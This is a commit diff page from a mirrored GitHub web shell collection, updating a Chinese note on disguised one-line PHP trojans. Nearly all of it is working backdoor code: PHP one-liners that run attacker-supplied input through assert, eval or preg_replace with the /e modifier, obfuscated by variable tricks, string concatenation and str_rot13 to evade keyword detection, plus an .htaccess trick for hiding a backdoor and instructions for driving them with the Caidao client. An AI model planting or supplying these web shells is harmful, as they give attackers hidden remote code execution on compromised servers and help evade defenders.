2
0
Fork 0
mirror of https://github.com/tennc/webshell synced 2025-02-22 20:58:27 +00:00

update caidao-shell

This commit is contained in:
tennc 2013-05-24 10:43:57 +08:00
parent 70af4eb3fe
commit cc7095e2ef

View file

@ -1,14 +1,24 @@
三个变形的一句话PHP木马
三个变形的一句话PHP木马
第一个
<?php ($_=@$_GET[2]).@$_($_POST[1])?> 在菜刀里写http://site/1.php?2=assert密码是1 第二个
<?php ($_=@$_GET[2]).@$_($_POST[1])?> 在菜刀里写http://site/1.php?2=assert密码是1
第二个
<?php
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?> 在菜刀里写http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass。如果你用菜刀的附加数据的话更隐蔽或者用其它注射工具也可以因为是post提交的。 第三个
($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add'); str_rot13(riny)即编码后的eval完全避开了关键字又不失效果让人吐血 最后列几个高级的PHP一句话木马后门
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?> 在菜刀里写http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass。如果你用菜刀的附加数据的话更隐蔽或者用其它注射工具也可以因为是post提交的。
第三个
($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add'); str_rot13(riny)即编码后的eval完全避开了关键字又不失效果让人吐血
.htaccess做PHP后门
这个其实在2007年的时候作者GaRY就爆出了只是后边没人关注这个利用关键点在于一句话
AddType application/x-httpd-php .htaccess
###### SHELL ###### 这里写上你的后门吧###### LLEHS ######
最后列几个高级的PHP一句话木马后门
1
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");